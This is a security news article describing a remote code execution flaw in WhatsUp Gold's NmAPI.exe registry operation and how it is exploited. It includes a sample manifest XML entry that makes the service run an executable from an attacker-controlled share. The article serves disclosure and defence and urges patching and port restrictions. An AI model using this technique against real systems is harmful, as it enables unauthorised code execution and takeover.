Wednesday, February 12, 2025
HomeCyber Security NewsProgress WhatsUp Gold RCE Vulnerability - PoC Exploit Released

Progress WhatsUp Gold RCE Vulnerability – PoC Exploit Released

Published on

SIEM as a Service

Follow Us on Google News

A registry overwrite remote code execution (RCE) vulnerability has been identified in NmAPI.exe, part of the WhatsUp Gold network monitoring software.

This vulnerability, present in versions before 24.0.1, allows an unauthenticated remote attacker to execute arbitrary code on affected systems, posing significant security risks.

Vulnerability Details

The vulnerability lies within NmAPI.exe, a Windows Communication Foundation (WCF) application utilized by WhatsUp Gold.

Specifically, the flaw is found in the UpdateFailoverRegistryValues operation.

This function allows interactions with the Windows registry, enabling an attacker to write or alter registry entries without authentication.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

The operation can be exploited via a netTcpBinding at the endpoint net.tcp://<target-host>:9643. By leveraging this method, attackers can modify registry values under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

A key aspect of this vulnerability is the ability to change the InstallDir registry entry to point to a Universal Naming Convention (UNC) path controlled by an attacker, such as \\<attacker-ip>\share\WhatsUp.

Exploit Mechanism

Once the attacker manipulates the registry to redirect the InstallDir to an attacker-controlled network share, the stage is set for further exploitation.

When the Ipswitch Service Control Manager (ServiceControlManager.exe) service restarts—possibly triggered by a system restart or Windows update—it attempts to read various manifest files from the specified UNC path.

This action enables the attacker to define new processes to be executed by including a <ServerProcess> element in the WhatsUpPlatform-PluginManifest.xml file. For example, the attacker can specify:

<ServerProcess Id="28" Assemblyname="\\<attacker-ip>\share\evil.exe" Arguments="" EventName="XXXShutdownEvent" Description="XXX" ShutdownOrder="2">
    <NormalStartup StartupType="Automatic" StartupOrder="150" StartupDelay="2"/>
    <FailoverStartup StartupType="Manual" StartupOrder="150" StartupDelay="2"/>
</ServerProcess>

This configuration results in the automatic execution of a malicious executable (evil.exe) controlled by the attacker.

According to the Tenable report, the release of a Proof-of-Concept (PoC) exploit underscores the urgency for organizations using affected versions of WhatsUp Gold to upgrade to version 24.0.1 or later.

Failure to patch this vulnerability could lead to unauthorized access and control over systems, highlighting the importance of immediate action in securing network monitoring environments.  

Cybersecurity experts advise implementing network-level mitigations alongside the software update. This includes restricting access to TCP port 9643 to trusted hosts and continuously monitoring for any suspicious registry modifications.

As always, maintaining up-to-date backups and implementing comprehensive intrusion detection systems are essential components of a robust security posture.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Enhancing Threat Detection With Improved Metadata & MITRE ATT&CK tags

The cybersecurity landscape continues to evolve rapidly, demanding more sophisticated tools and methodologies to...

Hackers Exploit Ivanti Connect Secure Vulnerability to Inject SPAWNCHIMERA malware

In a concerning development, cybersecurity experts have identified active exploitation of a critical vulnerability...

ZeroLogon Ransomware Exploits Windows AD to Hijack Domain Controller Access

A newly intensified wave of ransomware attacks has surfaced, leveraging the infamous ZeroLogon vulnerability...

Cl0p Ransomware Hide Itself on Compromised Networks After Exfiltrate the Data

The Cl0p ransomware group, a prominent player in the cybercrime landscape since 2019, has...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Enhancing Threat Detection With Improved Metadata & MITRE ATT&CK tags

The cybersecurity landscape continues to evolve rapidly, demanding more sophisticated tools and methodologies to...

Hackers Exploit Ivanti Connect Secure Vulnerability to Inject SPAWNCHIMERA malware

In a concerning development, cybersecurity experts have identified active exploitation of a critical vulnerability...

ZeroLogon Ransomware Exploits Windows AD to Hijack Domain Controller Access

A newly intensified wave of ransomware attacks has surfaced, leveraging the infamous ZeroLogon vulnerability...